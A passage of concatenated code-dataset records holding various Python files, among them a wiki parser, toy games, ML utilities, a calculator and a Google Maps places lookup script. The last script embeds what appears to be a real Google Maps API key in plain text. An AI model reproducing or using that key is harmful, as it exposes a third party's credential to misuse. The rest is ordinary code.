param_names.items()}\n\n return merge(params, {\"type\": bname})\n\n if obj[\"name\"] == \"liste\":\n if \"liste\" in obj[\"params\"]:\n sublist = obj[\"params\"][\"liste\"][0]\n\n assert sublist[\"type\"] == \"list\"\n\n items = sublist[\"items\"]\n ordered = sublist[\"ordered\"]\n else:\n items = [{\"type\": \"listitem\", \"content\": self(x)}\n for x in obj[\"params\"][\"item_list\"]]\n ordered = obj[\"params\"].get(\"type\", \"\") == \"ol\"\n\n return {\"type\": \"list\", \"items\": items, \"ordered\": ordered,\n \"spacing\": obj[\"params\"].get(\"abstand\", None)}\n elif obj[\"name\"] == \"formel\":\n formula = obj[\"params\"].get(\"1\", [])\n\n if len(formula) == 1 and \\\n lookup(formula, 0, \"type\") == \"inlinemath\":\n formula = formula[0][\"formula\"]\n if formula.startswith(\"\\\\begin{align}\") and formula.endswith(\"\\\\end{align}\"):\n formula = remove_prefix(formula, \"\\\\begin{align}\")\n formula = remove_suffix(formula, \"\\\\end{align}\")\n formula = \"\\\\begin{align}\" + formula + \"\\\\end{align}\"\n return {\"type\": \"equation\", \"formula\": formula}\n else:\n message = \"Wrong formatted equation\"\n details = \"Equation source code must be completely contained in just one .\\n (use \\\\text{this is not math} macro instead)\"\n\n log_parser_error(message, obj, details, self.current_section)\n\n return {\"type\": \"error\",\n \"message\": message}\n elif obj[\"name\"] == \"(!\":\n return None\n elif obj[\"name\"].startswith(\"#invoke:\"):\n # Template is header or footer\n return None\n elif obj[\"name\"] == \"noprint\":\n return None\n elif obj[\"name\"] == \"todo\":\n message = \"Todo-Message in MediaWiki code.\"\n details = \"Check if this TODO shoud be completed for a book release.\"\n log_parser_error(message, obj, details, self.current_section)\n\n return {\"type\": \"error\",\n \"message\": message}\n else:\n message = \"Parsing of template `{}`\".format(obj[\"name\"])\n log_parser_error(message, obj, position=self.current_section)\n\n return {\"type\": \"notimplemented\",\n \"target\": obj,\n \"message\": message}\n\n class NormalizeFormulas(NodeTypeTransformation):\n def normalize(self, obj, mode):\n try:\n formula = self.api.normalize_formula(obj[\"formula\"], mode)\n\n if mode == \"tex\":\n formula = remove_prefix(formula, \"{\\\\begin{aligned}\")\n formula = remove_suffix(formula, \"\\\\end{aligned}}\")\n except ValueError:\n message = \"Wrong formatted formula\"\n # TODO: current_section was not set for this class\n log_parser_error(message, obj)\n return {\"type\": \"error\",\n \"message\": message}\n\n return merge(obj, {\"formula\": formula})\n\n def transform_inlinemath(self, obj):\n return self.normalize(obj, \"inline-tex\")\n\n def transform_equation(self, obj):\n return self.normalize(obj, \"tex\")\n\n class DeleteEmptyNodes(Transformation):\n pass\n\n class AddDefaultValues(NodeTransformation):\n def transform_dict(self, obj):\n check(obj, \"type\").of(DEFAULT_VALUES)\n\n return merge(DEFAULT_VALUES[obj[\"type\"]],\n super(NodeTransformation, self).act_on_dict(obj))\n\ndef parse_article_inline(api, title, text):\n # TODO: there might be a better solution by merging with parse_inline()\n result = ArticleContentParser(api=api, title=title)(text)\n\n assert len(result) == 1\n assert result[0][\"type\"] == \"paragraph\"\n\n return result[0][\"content\"]\n\nclass ArticleParser(ChainedAction):\n class LoadArticleContent(NodeTypeTransformation):\n \"\"\"Loads the content of an article.\"\"\"\n\n def get_article_authors(self, title):\n revisions = 
self.api.get_revisions(title)\n\n authors = defaultdict(int)\n article_size = 0\n\n for rev in (x for x in reversed(revisions) if \"anon\" not in x):\n user = resolve_usernames(rev[\"user\"])\n authors[user] += max(rev[\"size\"] - article_size, 50)\n article_size = rev[\"size\"]\n\n return authors\n\n def transform_article(self, article):\n parser = ArticleContentParser(api=self.api, title=article[\"title\"])\n\n article_link = self.api._index_url + \"?title=\" + article[\"title\"].replace(\" \", \"+\")\n report_logger.info(\"== Parsing of Article [{} {}] ==\".format(article_link, article[\"title\"]))\n\n content = parser(self.api.get_content(article[\"title\"]))\n authors = self.get_article_authors(article[\"title\"])\n\n return merge(article, {\"content\": content, \"authors\": authors})\n\n class MergeAuthorCounts(NodeTypeTransformation):\n def transform_chapter(self, obj):\n authors = defaultdict(int)\n\n for k, v in chain(*(x[\"authors\"].items() for x in obj[\"children\"])):\n authors[k] += v\n\n return merge(obj, {\"authors\": authors})\n\n class MergeIncludedSections(NodeTypeTransformation):\n \"\"\"Removes the `included_section` intermediate node.\"\"\"\n\n def transform_included_section(self, obj):\n return {\"type\": \"error\",\n \"message\": \"Included section not merged.\"}\n\n def transform_article(self, obj):\n if not next(filter(lambda x: x[\"type\"] == \"included_section\",\n obj[\"content\"]),\n None):\n return obj\n merged_content = chain(*(x[\"content\"]\n if x[\"type\"] == \"included_section\"\n else [x]\n for x in obj[\"content\"]))\n return merge(obj, {\"content\": list(merged_content)})\n\n class BuildStructureTree(NodeTypeTransformation, SectionTracking):\n \"\"\"Transforms a flat article into a tree based on its structure.\"\"\"\n\n def split_list(self, prd, lst):\n subforest = [[]]\n for elem in lst:\n if prd(elem):\n subforest.append([])\n else:\n subforest[-1].append(elem)\n return subforest if len(subforest[0]) > 0 else subforest[1:]\n\n def unfold_section(self, obj, level):\n test = lambda x: x[\"type\"] == \"header\" and x[\"depth\"] == level\n headings = list(filter(test, obj[\"content\"]))\n contents = self.split_list(test, obj[\"content\"])\n # case 1: no underlying structure\n if not headings and len(contents) == 1:\n subsections = obj[\"content\"]\n # case 2: no paragraph before first header\n elif len(headings) == len(contents):\n subsections = [{\"type\": \"section\",\n \"title\": h[\"content\"],\n \"depth\": h[\"depth\"],\n \"content\": c}\n for h, c in zip(headings, contents)]\n # case 3: one paragraph before first header\n elif len(headings) == len(contents) - 1:\n subsections = (contents[0] +\n [{\"type\": \"section\",\n \"title\": h[\"content\"],\n \"depth\": h[\"depth\"],\n \"content\": c}\n for h, c in zip(headings, contents[1:])])\n # mismatch between headers and paragraphs\n else:\n message = \"ill-formed structure in article\"\n subsections = [{\"type\": \"error\",\n \"message\": message}]\n log_parser_error(message, obj, position=self.current_position)\n return merge(obj, {\"content\": self(subsections)})\n\n def transform_article(self, obj):\n return self.unfold_section(obj, 1)\n\n def transform_section(self, obj):\n return self.unfold_section(obj, obj[\"depth\"] + 1)\n\n class RemoveExcludedSections(NodeTypeTransformation):\n def __init__(self, **options):\n super().__init__(**options)\n self.excludes = []\n\n def transform_article(self, obj):\n # TODO: parse_inline(x) should be called before\n self.excludes = 
[parse_article_inline(self.api, obj[\"title\"], x)\n                             for x in obj[\"excludes\"]]\n\n            raise NotInterested()\n\n        def transform_section(self, obj):\n            if obj[\"title\"] in self.excludes:\n                return\n            else:\n                raise NotInterested()\n","sub_path":"mfnf/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":33710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"20397900","text":"# https://leetcode.com/problems/longest-common-prefix/\n\n\"\"\"\nBrute force: first find the longest prefix of the first and second elements; the common prefix\nof any later element must be no longer than that prefix.\nCompare the third element against the longest prefix of the first two, then replace it (old_prefix == long_prefix),\nand repeat until the last element has been compared. The result is the longest prefix of the whole array.\n\nbinary search: TBD\n\"\"\"\nclass Solution(object):\n    def longestCommonPrefix(self, strs):\n        \"\"\"\n        :type strs: List[str]\n        :rtype: str\n        \"\"\"\n        target = strs[0]  # use the first element as the target\n        for source in strs[1:]:\n            if len(target) == 0 or len(source) == 0 or target[0] != source[0]:\n                # empty string, or the first characters already differ: no common prefix, return empty\n                return \"\"\n            i = j = 0\n            # the first characters match, so start comparing from the second one\n            while i < len(target) and j < len(source):\n                if target[i] != source[j]:\n                    break\n                i += 1\n                j += 1\n            # take the longest prefix found and replace the target with it\n            target = target[: i]\n        return target\n    ","sub_path":"most_interviewed/string/longest_common_prefix.py","file_name":"longest_common_prefix.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"412475025","text":"# coding=utf-8\n# Date: 15/4/3'\n# Email: wangjian2254@icloud.com\nimport json\nfrom django.conf import settings\n\n__author__ = u'王健'\n\n# Generate the list file of banner URLs\n# Add BAE test banners\n# by: 尚宗凯 at: 2015-4-6\n\nf = file('../static/client_banner/banner.json', 'w')\nl = []\nfor i in range(5):\n    l.append('http://baetest.tjeasyshare.com/static/client_banner/home_banner%s.jpg' % i)\nf.write(json.dumps(l))\nf.close()","sub_path":"dev_files/banner.py","file_name":"banner.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"644977972","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport feedparser\n\nfrom model import Event_tagger\nfrom constants import MODEL_PATH\n\n\ndef to_ix(word, word_to_ix):\n    return word_to_ix[word] if word in word_to_ix else word_to_ix[\n        '`'] # ` - being pad word\n\n\ndef prepare_data():\n    NewsFeed = feedparser.parse(\"https://news.yandex.ru/politics.rss\")\n    data = []\n    links = []\n    for entry in NewsFeed.entries:\n        data.append(entry['summary'].replace('&quot;',\n                                             '').replace('»', '').replace('«', ''))\n        links.append(entry['link'])\n    return data, links\n\n\ndef tokenize_data(data, word_to_ix):\n    data_splitted = []\n    data_ix = []\n    for text in data:\n        data_splitted.append([a.split() for a in text.split(\".\")][:-1])\n        last = data_splitted[-1]\n        text_ix = []\n        for sent in last:\n            text_ix.append(torch.tensor([to_ix(word, word_to_ix) for word in sent], dtype=torch.long))\n        data_ix.append(text_ix)\n    return data_splitted, data_ix\n\n\ndef entity_extraction(data_ix, model):\n    all_tags = []\n    for word_indices in data_ix:\n        predicted_tags = []\n        for i in range(len(word_indices)):\n            tag_scores = model(torch.stack([word_indices[i]]))\n            out_probs = torch.squeeze(tag_scores)\n            tmp = []\n            for j, pset in enumerate(out_probs):\n                if j >= len(word_indices[i]):\n                    break\n                _, predicted_ix = torch.max(pset, 0)\n                tmp.append(predicted_ix.item())\n            predicted_tags.append(tmp)\n        all_tags.append(predicted_tags)\n    return all_tags\n\n\ndef 
transform_result(tags, data_splitted, ix_to_tag):\n    ans_dict = []\n    for text in range(len(tags)):\n        ans_text = []\n        for sent in range(len(tags[text])):\n            ans_sent = []\n            for word in range(len(tags[text][sent])):\n                ans_sent.append((ix_to_tag[tags[text][sent][word]],\n                                 data_splitted[text][sent][word]))\n            ans_text.append(ans_sent)\n        ans_dict.append(ans_text)\n    return ans_dict\n\n\ndef crawl_news():\n    model = torch.load(MODEL_PATH)\n\n    word_to_ix = model.word_to_ix\n    ix_to_tag = model.ix_to_tag\n\n    # clean data - [doc, doc]\n    data, links = prepare_data()\n    data_splitted, data_ix = tokenize_data(data, word_to_ix)\n\n    # extract entities\n    tags = entity_extraction(data_ix, model)\n    ans_dict = transform_result(tags, data_splitted, ix_to_tag)\n    return ans_dict, data_splitted, links\n","sub_path":"demo/crawl_news.py","file_name":"crawl_news.py","file_ext":"py","file_size_in_byte":2584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"321436416","text":"from django.core.exceptions import ValidationError\nfrom django.utils.translation import gettext_lazy as _\n\n\ndef validate_phone(value):\n    if type(value) != str or not value.startswith('998') or len(value) != 12:\n        raise ValidationError(\n            _('%(value)s is not a valid phone number'),\n            params={'value': value},\n        )\n","sub_path":"apps/utils/validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"372150399","text":"from __future__ import print_function, division, absolute_import\n\nimport argparse\nimport random\nimport json\nfrom collections import OrderedDict\n\nimport cv2\nimport numpy as np\nimport torch as th\nfrom sklearn.neighbors import KNeighborsClassifier\n\nfrom models.learner import SRL4robotics\nfrom preprocessing.utils import deNormalize\nfrom preprocessing.data_loader import preprocessImage\nfrom utils import detachToNumpy\n\nVALID_MODELS = [\"forward\", \"inverse\", \"reward\", \"priors\", \"episode-prior\", \"reward-prior\", \"triplet\",\n                \"autoencoder\", \"vae\", \"dae\", \"random\"]\nAUTOENCODERS = ['autoencoder', 'vae', 'dae']\n\n\ndef getState(srl_model, obs, device):\n    \"\"\"\n    Gets the latent state of an observation by using the encoder\n    of a SRL model\n\n    :param srl_model: (Pytorch model)\n    :param obs: ([float]) the raw observation image\n    :param device: (pytorch device)\n    :return: ([float]) the state vector from latent space\n    \"\"\"\n    obs = preprocessImage(obs)\n    obs = th.tensor(obs.reshape((1,) + obs.shape).transpose(0, 3, 2, 1))\n    with th.no_grad():\n        obs = obs.to(device)\n        net_out = srl_model.getStates(obs)\n        state = detachToNumpy(net_out)[0].T\n\n    return state\n\ndef getImage(srl_model, state, device):\n    \"\"\"\n    Gets an image by using the decoder of a SRL model\n    (when available)\n\n    :param srl_model: (Pytorch model)\n    :param state: ([float]) the state vector from latent space\n    :param device: (pytorch device)\n    :return: ([float])\n    \"\"\"\n    with th.no_grad():\n        state = th.from_numpy(np.array(state).reshape(1, -1)).float()\n        state = state.to(device)\n\n        net_out = srl_model.decode(state)\n        img = detachToNumpy(net_out)[0].T\n\n    img = deNormalize(img, mode=\"image_net\")\n    return img[:, :, ::-1]\n\ndef getNextState(srl_model, state, action, device):\n    with th.no_grad():\n        state = th.from_numpy(np.array(state).reshape(1, -1)).float()\n        action = th.from_numpy(np.array(action).reshape(1, -1)).long()\n\n        state = state.to(device)\n        action = action.to(device)\n\n        
net_out = srl_model.forwardModel(state, action)\n        state = detachToNumpy(net_out)[0]\n        # print (\"Next State : \" + str(state))\n\n    return state\n\ndef main():\n    parser = argparse.ArgumentParser(description=\"latent space enjoy\")\n    parser.add_argument('--log-dir', default='', type=str, help='directory to load model')\n    parser.add_argument('--no-cuda', default=False, action=\"store_true\")\n\n    args = parser.parse_args()\n    use_cuda = not args.no_cuda\n    device = th.device(\"cuda\" if th.cuda.is_available() and use_cuda else \"cpu\")\n\n    srl_model, exp_config = SRL4robotics.loadSavedModel(args.log_dir, VALID_MODELS, cuda=use_cuda)\n\n    losses = exp_config['losses']\n    state_dim = exp_config['state-dim']\n\n    split_dimensions = exp_config.get('split-dimensions')\n    loss_dims = OrderedDict()\n    n_dimensions = 0\n    if split_dimensions is not None and isinstance(split_dimensions, OrderedDict):\n        for loss_name, loss_dim in split_dimensions.items():\n            print(loss_name, loss_dim)\n            if loss_dim > 0 or len(split_dimensions) == 1:\n                loss_dims[loss_name] = loss_dim\n\n    if len(loss_dims) == 0:\n        print(losses)\n        loss_dims = {losses[0]: state_dim}\n\n    # Load all the states and images\n    data = json.load(open(args.log_dir + 'image_to_state.json'))\n    X = np.array(list(data.values())).astype(float)\n    y = list(data.keys())\n\n    should_exit = False\n\n    cv2.namedWindow(\"Dream\", cv2.WINDOW_NORMAL)\n    cv2.resizeWindow(\"Dream\", 500, 500)\n\n    num_steps = 1000\n\n    # random.randint is inclusive on both ends, so the upper bound must be len(y) - 1\n    initial_img = cv2.imread(\"data/\"+y[random.randint(0, len(y) - 1)]+\".jpg\")\n    initial_state = getState(srl_model.model, initial_img, device)\n    state = initial_state\n    # print (\"First state : \" + str(state))\n\n    obs = initial_img\n    for step in range(num_steps):\n        cv2.imshow(\"Dream\", obs)\n        k = cv2.waitKey(150) & 0xFF\n        if k == 27:\n            break\n\n        action = random.randint(0, 5)\n        # print (\"Selected action : \" + str(action))\n        next_state_pred = getNextState(srl_model.model, state, action,\n                                       device)\n        obs = getImage(srl_model.model.model, next_state_pred, device)\n\n        state = next_state_pred\n\n        # Next state comes from the encoding of the current observation\n        # state = getState(srl_model.model, img, device)\n\n    # gracefully close\n    cv2.destroyAllWindows()\n\nif __name__ == '__main__':\n    main()\n","sub_path":"evaluation/dream.py","file_name":"dream.py","file_ext":"py","file_size_in_byte":4466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"547681115","text":"import pygame\nimport gameMouseD\nfrom dodger_data import *\n\nclass Dodger(gameMouseD.Game):\n    \n    def __init__(self, width, height, frame_rate):\n\n        gameMouseD.Game.__init__(self, \"Dodger\",\n                                 width,\n                                 height,\n                                 frame_rate)\n\n\n        pygame.mouse.set_visible(False)\n        self.data = DodgerData(self.width, self.height, self.frames_per_second)\n        self.background_color = (0, 0, 0)\n        self.text_color = (255, 255, 255)\n        self.font = pygame.font.SysFont(None, 48)\n        self.player_image = pygame.image.load('X-Wing Up.png')\n        self.baddie_image = pygame.image.load('asteroid.png')\n\n\n    def game_logic(self, keys, newkeys, buttons, newbuttons, mouse_position):\n        x = mouse_position[0]\n        y = mouse_position[1]\n\n        if not self.data.getEvolving():\n            if len(newkeys) > 0:\n                self.data.newGame()\n                self.data.setEvolving(True)\n                # self.game_over_sound.stop()\n                # pygame.mixer.music.play(-1, 0.0)\n                pygame.mouse.set_pos(self.data.getPlayerLocationX(), self.data.getPlayerLocationY())\n            \n        else:\n            if pygame.K_RIGHT in keys:\n                self.data.right()\n            if pygame.K_LEFT in keys:\n                self.data.left()\n            if 
+{"seq_id":"547681115","text":"import pygame\nimport gameMouseD\nfrom dodger_data import *\n\nclass Dodger(gameMouseD.Game):\n \n def __init__(self, width, height, frame_rate):\n\n gameMouseD.Game.__init__(self, \"Dodger\",\n width,\n height,\n frame_rate)\n\n\n pygame.mouse.set_visible(False)\n self.data = DodgerData(self.width, self.height, self.frames_per_second)\n self.background_color = (0, 0, 0)\n self.text_color = (255, 255, 255)\n self.font = pygame.font.SysFont(None, 48)\n self.player_image = pygame.image.load('X-Wing Up.png')\n self.baddie_image = pygame.image.load('asteroid.png')\n\n\n def game_logic(self, keys, newkeys, buttons, newbuttons, mouse_position):\n x = mouse_position[0]\n y = mouse_position[1]\n\n if not self.data.getEvolving():\n if len(newkeys) > 0:\n self.data.newGame()\n self.data.setEvolving(True)\n # self.game_over_sound.stop()\n # pygame.mixer.music.play(-1, 0.0)\n pygame.mouse.set_pos(self.data.getPlayerLocationX(), self.data.getPlayerLocationY())\n \n else:\n if pygame.K_RIGHT in keys:\n self.data.right()\n if pygame.K_LEFT in keys:\n self.data.left()\n if pygame.K_UP in keys:\n self.data.up()\n if pygame.K_DOWN in keys:\n self.data.down()\n\n \n self.data.evolve()\n\n if self.data.getGameOver():\n pygame.mixer.music.stop()\n # self.game_over_sound is never loaded, so calling play() would raise AttributeError\n # self.game_over_sound.play()\n\n return\n \n def drawTextLeft(self, text, surface, x, y):\n textobj = self.font.render(text, 1, self.text_color)\n textrect = textobj.get_rect()\n textrect.topleft = (x, y)\n surface.blit(textobj, textrect)\n return\n \n def drawTextCenter(self, text, surface, x, y):\n textobj = self.font.render(text, 1, self.text_color)\n textrect = textobj.get_rect()\n textrect.center = (x, y)\n surface.blit(textobj, textrect)\n return\n \n def paint(self, surface):\n rect = pygame.Rect(0, 0, self.width, self.height)\n surface.fill(self.background_color, rect)\n\n self.drawTextLeft('Score: %s' % (self.data.getScore()), surface, 10, 0)\n self.drawTextLeft('Top Score: %s' % (self.data.getTopScore()), surface, 10, 40)\n\n img = pygame.transform.scale(self.player_image, (self.data.getPlayerSize(), self.data.getPlayerSize()))\n surface.blit(img, (self.data.getPlayerLocationX(), self.data.getPlayerLocationY()))\n \n for b in self.data.baddies:\n img = pygame.transform.scale(self.baddie_image, (b[2], b[3]))\n surface.blit(img, (b[0], b[1]))\n \n if not self.data.getEvolving() and not self.data.getGameOver():\n self.drawTextCenter('Dodger', surface,\n self.width/2, self.height/3)\n self.drawTextCenter('Press a key to start', surface,\n self.width/2, self.height/2)\n elif not self.data.getEvolving() and self.data.getGameOver():\n self.drawTextCenter('GAME OVER', surface,\n self.width/2, self.height/3)\n self.drawTextCenter('Press a key to play again', surface,\n self.width/2, self.height/2)\n \n else:\n pass\n return\n \ndef mainD():\n pygame.font.init()\n pygame.mixer.init()\n d = Dodger(600, 600, 40)\n d.main_loop()\n \nif __name__ == \"__main__\":\n mainD()\n\n","sub_path":"dodger.py","file_name":"dodger.py","file_ext":"py","file_size_in_byte":3730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"563008863","text":"import unittest\nimport os\nfrom GPyUnit.util import DispatchEx, com_error\n\nclass TestParser(unittest.TestCase):\n def test_ParseMetaGME(self):\n testdir = os.path.dirname(os.path.abspath(__file__))\n inputfile = os.environ['GME_ROOT'] + r\"\\Paradigms\\MetaGME\\MetaGME-model.xme\"\n xme = DispatchEx(\"Mga.MgaParser\")\n (paradigm, parversion, parguid, basename, ver) = xme.GetXMLInfo(inputfile)\n mga = DispatchEx(\"Mga.MgaProject\")\n\n mga.Create(\"MGA=tmp.mga\", paradigm)\n terr = mga.BeginTransactionInNewTerr()\n # GME-371: this would crash\n self.assertRaises(com_error, xme.ParseProject, mga, inputfile)\n return\n mga.CommitTransaction()\n terr.Destroy()\n mga.Save()\n mga.Close()\n del(terr)\n del(mga)\n del(xme)\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"Tests/GPyUnit/GME_371.py","file_name":"GME_371.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
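dodger.py above overrides game_logic() and paint() on a gameMouseD.Game base class that is not included in this dump. A minimal stand-in for that frame-loop contract, inferred from the calls the subclass makes (purely an assumption about the missing module):

import pygame

class Game:
    """Inferred contract: subclasses supply game_logic() and paint()."""
    def __init__(self, title, width, height, frame_rate):
        pygame.init()
        self.width, self.height, self.frames_per_second = width, height, frame_rate
        self.surface = pygame.display.set_mode((width, height))
        pygame.display.set_caption(title)

    def main_loop(self):
        clock, keys = pygame.time.Clock(), set()
        while True:
            newkeys = set()
            for e in pygame.event.get():
                if e.type == pygame.QUIT:
                    return
                if e.type == pygame.KEYDOWN:
                    keys.add(e.key); newkeys.add(e.key)
                elif e.type == pygame.KEYUP:
                    keys.discard(e.key)
            self.game_logic(keys, newkeys, [], [], pygame.mouse.get_pos())
            self.paint(self.surface)
            pygame.display.flip()
            clock.tick(self.frames_per_second)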
+{"seq_id":"360451344","text":"# !usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# Licensed under a 3-clause BSD license.\n#\n# @Author: Brian Cherinka\n# @Date: 2018-06-20 14:45:48\n# @Last modified by: Brian Cherinka\n# @Last Modified time: 2018-07-05 10:36:39\n\nfrom __future__ import print_function, division, absolute_import\n\n\nclass Telescope(object):\n ''' A Telescope configuration '''\n\n def __init__(self, name, **kwargs):\n self.name = name\n\n for key, value in kwargs.items():\n setattr(self, key, value)\n\n def __repr__(self):\n return '<Telescope {0}>'.format(self.name)\n\n\n\ndef initialize(config, params=None):\n ''' Initialize a telescope from a set of configuration parameters '''\n\n survey = config.instrument.name\n size = params.get('telescope', '') if params else ''\n name = '{0} {1}'.format(survey, size)\n\n # copy the telescope constants over from the Instrument object\n area_params = config.get_constants(config.instrument)\n\n telescope = Telescope(name, **area_params)\n return telescope\n\n\n","sub_path":"specsim/telescope.py","file_name":"telescope.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"486402675","text":"\"\"\"\nwebob_wsgi.py\n\"\"\"\nfrom webob import Request, Response\nfrom wsgiref.simple_server import make_server\n\n\ndef wsgi_hello_app(environ, start_response):\n response = Response(\"Hello World\")\n\n #did you know that Response is a wsgi application\n return response(environ, start_response)\n\n# or this one-liner, because Response is a wsgi application\nwsgi_hello_app = Response(\"Hello World\")\n\n\ndef wsgi_hello_middleware(app):\n def m(environ, start_response):\n request = Request(environ)\n\n # request is a lot easier to manipulate than a dictionary\n # let's add a header to prove a point\n request.headers[\"WSGI-Hello-Middleware\"] = \"Say Hello Application\"\n\n # call a wsgi app and convert what it returns into a\n # webob.Response which is easier to manipulate\n response = request.get_response(app)\n\n response.headers[\"WSGI-Application-Middleware\"] = \"Say Hello Caller\"\n return response(environ, start_response)\n return m\n\n\napplication = wsgi_hello_middleware(wsgi_hello_app)\nserver = make_server(\"localhost\", 8080, application)\nserver.handle_request()\n","sub_path":"doc/source/webob_wsgi.py","file_name":"webob_wsgi.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
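The webob record can be exercised without starting the bundled wsgiref server: Request.blank builds a synthetic WSGI environ, so the middleware chain is testable in-process (assumes webob is installed; 'application' is the object defined in the record):

from webob import Request

req = Request.blank("/")
resp = req.get_response(application)  # runs the middleware plus the wrapped app
print(resp.status)                                      # 200 OK
print(resp.headers.get("WSGI-Application-Middleware"))  # Say Hello Caller
print(resp.text)                                        # Hello World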
+{"seq_id":"133969860","text":"import sys\nsys.stdin = open(\"input계산기3.txt\")\n\n# Operator types: +, *, (, )\n# Operands go straight to the output (appended to the postfix expression)\n# Between + and *, multiplication has the higher precedence\n# Push an opening parenthesis onto the stack,\n# and pop from the stack once the matching closing parenthesis appears\n\n# Convert the infix expression to postfix\n# Evaluate the postfix expression and return the result\ndef solve(exp):\n stack = list() # stack used while building the postfix expression\n # 1. Convert to postfix notation\n postfix = '' # holds the postfix expression\n # 1. Read the expression one character at a time\n for i in range(L):\n # 2. If an operand (digit) appears, append it to the postfix expression (works because the digit characters compare by character code)\n if \"0\" <= exp[i] <= \"9\":\n postfix += exp[i]\n # 3. If an operator appears, push or pop according to precedence\n elif exp[i] == \"(\":\n stack.append(exp[i])\n elif exp[i] == \")\":\n # Pop until the opening parenthesis, appending to the postfix expression\n while stack[-1] != \"(\":\n postfix += stack.pop()\n stack.pop() # discard the opening parenthesis\n else: # exp[i] is + or *\n if not stack:\n stack.append(exp[i])\n continue\n # If it is * and stack[-1] is not *, push\n # If it is + and stack[-1] is an opening parenthesis, push\n # Otherwise pop until the top is no longer * or +, then push\n if exp[i] == \"*\":\n stack.append(exp[i])\n elif exp[i] == '+' and stack[-1] == \"(\": # nothing of lower precedence can sit above '('...\n stack.append(exp[i])\n else:\n # pop from the stack\n while (stack and (stack[-1] == \"*\" or stack[-1] == \"+\")):\n postfix += stack.pop()\n stack.append(exp[i])\n while stack:\n postfix += stack.pop()\n cstack = list()\n # 2. Evaluate the postfix expression\n # Push operands onto the stack\n # For an operator, pop two operands off the stack and compute\n for i in range(len(postfix)):\n if postfix[i] == \"*\":\n v1 = cstack.pop()\n v2 = cstack.pop()\n cstack.append(v1 * v2)\n elif postfix[i] == \"+\":\n v1 = cstack.pop()\n v2 = cstack.pop()\n cstack.append(v1 + v2)\n else:\n cstack.append(int(postfix[i]))\n return cstack.pop()\n\n\nfor tc in range(1, 11):\n L = int(input())\n exp = input()\n result = solve(exp)\n print(\"#{} {}\".format(tc,result))","sub_path":"SWEA/문제/210302_과제_계산기3.py","file_name":"210302_과제_계산기3.py","file_ext":"py","file_size_in_byte":2720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
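As a sanity check on the conversion above: for the input (3+4)*2 the stack logic emits the postfix string 34+2*, which a minimal standalone evaluator confirms (independent of the record's stdin-driven I/O):

def eval_postfix(postfix):
    stack = []
    for ch in postfix:
        if ch.isdigit():
            stack.append(int(ch))
        else:
            b, a = stack.pop(), stack.pop()
            stack.append(a + b if ch == "+" else a * b)
    return stack.pop()

print(eval_postfix("34+2*"))  # -> 14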
(E/W/N/S) \").strip().lower()\n if moving.can_move(user_input, user['row'], user['column']):\n moving.move(user_input, user)\n if monster.encounter_monster():\n combat.fight_or_run_away(user)\n if combat.is_dead(user):\n user['Hp'], user_input = 10, \"quit\" # Hp full up for the next game, and quit the game.\n else:\n support_function.up_1_hp(user)\n elif user_input == \"quit\":\n support_function.save_user_info(user)\n else:\n print(\"Enter the direction again please.\")\n\n\ndef main():\n character.log_in()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"A3/sud.py","file_name":"sud.py","file_ext":"py","file_size_in_byte":1763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"243367266","text":"import googlemaps\r\nfrom datetime import datetime\r\n\r\nfrom googlemaps import convert\r\nfrom uuid import uuid4 as places_autocomplete_session_token\r\nimport geocoder\r\nimport csv\r\n\r\nfrom math import radians, cos, sin, asin, sqrt\r\nimport os\r\n\r\n\r\ndef haversine(lon1, lat1, lon2, lat2):\r\n \"\"\"\r\n Calculate the great circle distance between two points \r\n on the earth (specified in decimal degrees)\r\n \"\"\"\r\n # convert decimal degrees to radians \r\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\r\n\r\n # haversine formula \r\n dlon = lon2 - lon1 \r\n dlat = lat2 - lat1 \r\n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\r\n c = 2 * asin(sqrt(a)) \r\n r = 3956 # Radius of earth in kilometers. Use 3956 for miles\r\n return c * r\r\n\r\n\r\n\r\n\r\nPLACES_FIND_FIELDS_BASIC = set([\r\n \"formatted_address\", \"geometry\", \"icon\", \"id\", \"name\",\r\n \"permanently_closed\", \"photos\", \"place_id\", \"plus_code\", \"scope\",\r\n \"types\",\r\n])\r\n\r\nPLACES_FIND_FIELDS_CONTACT = set([\"opening_hours\",])\r\n\r\nPLACES_FIND_FIELDS_ATMOSPHERE = set([\"price_level\", \"rating\"])\r\n\r\nPLACES_FIND_FIELDS = (PLACES_FIND_FIELDS_BASIC ^\r\n PLACES_FIND_FIELDS_CONTACT ^\r\n PLACES_FIND_FIELDS_ATMOSPHERE)\r\n\r\nPLACES_DETAIL_FIELDS_BASIC = set([\r\n \"address_component\", \"adr_address\", \"alt_id\", \"formatted_address\",\r\n \"geometry\", \"icon\", \"id\", \"name\", \"permanently_closed\", \"photo\",\r\n \"place_id\", \"plus_code\", \"scope\", \"type\", \"url\", \"utc_offset\", 